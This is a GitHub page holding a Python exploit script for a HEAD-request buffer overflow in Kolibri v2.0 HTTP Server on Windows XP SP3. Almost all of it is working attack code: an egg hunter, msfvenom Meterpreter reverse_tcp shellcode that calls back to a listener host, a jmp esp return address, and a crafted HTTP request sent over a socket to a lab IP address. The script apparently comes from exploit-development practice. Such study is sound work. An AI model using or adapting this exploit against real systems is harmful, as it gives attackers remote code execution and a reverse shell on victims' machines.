ExploitDevelopment/KolibriHTTPServerExploit.py at master · brandonceja/ExploitDevelopment · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/python

#---------------------------------------------------------------------------------#
# Exploit: Kolibri v2.0 HTTP Server, HEAD  Buffer Overflow (Egg Hunter)    	  #
# OS: Windows XP Pro SP3						    	  #
# Software: http://cdn01.exploit-db.com/wp-content/themes/exploit/applications/   #
#           f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe    #
#									    	  #
# Author: Oraclox (Brandon Ceja)					          #
#---------------------------------------------------------------------------------#

import sys, os, socket

#-----------------------------------------------------------------------#
# Badchars: \x00\x0d\x0a\x3d\x20\x3f 		 			#
#-----------------------------------------------------------------------#
# Egg Hunter from Fuzzy Security                 			#
# Size = 32-bytes | Tag = 1337         					#
#-----------------------------------------------------------------------#
egg=(
"\x66\x81\xCA\xFF"
"\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E"
"\x3C\x05\x5A\x74"
"\xEF\xB8\x31\x33" #13
"\x33\x37\x8B\xFA" #37
"\xAF\x75\xEA\xAF"
"\x75\xE7\xFF\xE7"
)


#-----------------------------------------------------------------------#
# Shellcode:								#
#   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.211.131 	#
#	                LPORT=1337 -b "\x00\x0d\x0a\x3d\x20\x3f" -f c	#
#-----------------------------------------------------------------------#
# Connect using metasploit, exploit/multi/handler			#
#-----------------------------------------------------------------------#

shellcode = (
"\xda\xcb\xba\xa8\xf1\xc9\x38\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x56\x83\xc7\x04\x31\x57\x14\x03\x57\xbc\x13\x3c\xc4\x54\x51"
"\xbf\x35\xa4\x36\x49\xd0\x95\x76\x2d\x90\x85\x46\x25\xf4\x29"
"\x2c\x6b\xed\xba\x40\xa4\x02\x0b\xee\x92\x2d\x8c\x43\xe6\x2c"
"\x0e\x9e\x3b\x8f\x2f\x51\x4e\xce\x68\x8c\xa3\x82\x21\xda\x16"
"\x33\x46\x96\xaa\xb8\x14\x36\xab\x5d\xec\x39\x9a\xf3\x67\x60"
"\x3c\xf5\xa4\x18\x75\xed\xa9\x25\xcf\x86\x19\xd1\xce\x4e\x50"
"\x1a\x7c\xaf\x5d\xe9\x7c\xf7\x59\x12\x0b\x01\x9a\xaf\x0c\xd6"
"\xe1\x6b\x98\xcd\x41\xff\x3a\x2a\x70\x2c\xdc\xb9\x7e\x99\xaa"
"\xe6\x62\x1c\x7e\x9d\x9e\x95\x81\x72\x17\xed\xa5\x56\x7c\xb5"
"\xc4\xcf\xd8\x18\xf8\x10\x83\xc5\x5c\x5a\x29\x11\xed\x01\x25"
"\xd6\xdc\xb9\xb5\x70\x56\xc9\x87\xdf\xcc\x45\xab\xa8\xca\x92"
"\xba\xbf\xec\x4d\x04\xaf\x12\x6e\x74\xf9\xd0\x3a\x24\x91\xf1"
"\x42\xaf\x61\xfd\x96\x45\x68\x69\xd9\x31\xbf\xea\xb1\x43\x40"
"\xe8\x78\xca\xa6\xa2\x2a\x9c\x76\x03\x9b\x5c\x27\xeb\xf1\x53"
"\x18\x0b\xfa\xbe\x31\xa6\x15\x16\x69\x5f\x8f\x33\xe1\xfe\x50"
"\xee\x8f\xc1\xdb\x1a\x6f\x8f\x2b\x6f\x63\xf8\x4b\x8f\x7b\xf9"
"\xf9\x8f\x11\xfd\xab\xd8\x8d\xff\x8a\x2e\x12\xff\xf8\x2d\x55"
"\xff\x7c\x07\x2d\x36\xeb\x27\x59\x37\xfb\xa7\x99\x61\x91\xa7"
"\xf1\xd5\xc1\xf4\xe4\x19\xdc\x69\xb5\x8f\xdf\xdb\x69\x07\x88"
"\xe1\x54\x6f\x17\x1a\xb3\xf3\x50\xe4\x41\xdc\xf8\x8c\xb9\x5c"
"\xf9\x4c\xd0\x5c\xa9\x24\x2f\x72\x46\x84\xd0\x59\x0f\x8c\x5b"
"\x0c\xfd\x2d\x5b\x05\xa3\xf3\x5c\xaa\x78\x04\x26\xc3\x7f\xe5"
"\xd7\xcd\x1b\xe6\xd7\xf1\x1d\xdb\x01\xc8\x6b\x1a\x92\x6f\x63"
"\x29\xb7\xc6\xee\x51\xeb\x19\x3b"
)

#-------------------------------------------------------#
# Description stage1 : 				 	#
#	(1) Override EIP with pointer to ESP	 	#
#	(2) In ESP jump backwards 80 bytes	 	#
#	(3) Egg Hunter waiting in -80 bytes      	#
#-------------------------------------------------------#
# EPI: 0x77fab227 =  jmp esp | SHLWAPI.dll	 	#
# ESP: \xEB\xB0   =  jmp short -80 bytes	 	#
#-------------------------------------------------------#
# Description stage2 : 				 	#
#	(4) Send the shellcode in the User-Agent which	#
#	     is stored somewhere in memory  waiting 	#
#	     for the Egg Hunter to find him.		#
#-------------------------------------------------------#


# Structure: AAAA  + egg + BBBBBB   +      EPI            +          ESP             + CCCCCCC #
stage1 = "A" * 450 + egg + "B" * 33 + "\x27\xb2\xfa\x77"  + "\x90" * 10 + "\xEB\xB0" + "C" * 69
stage2 = "13371337" + shellcode

request = (
"HEAD /"+ stage1 + " HTTP 1.1\r\n"
"Host: 192.168.211.128:8080\r\n"
"User-Agent:" + stage2 + "\r\n"
"Keep Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.211.128", 8080))
s.send(request)
s.close()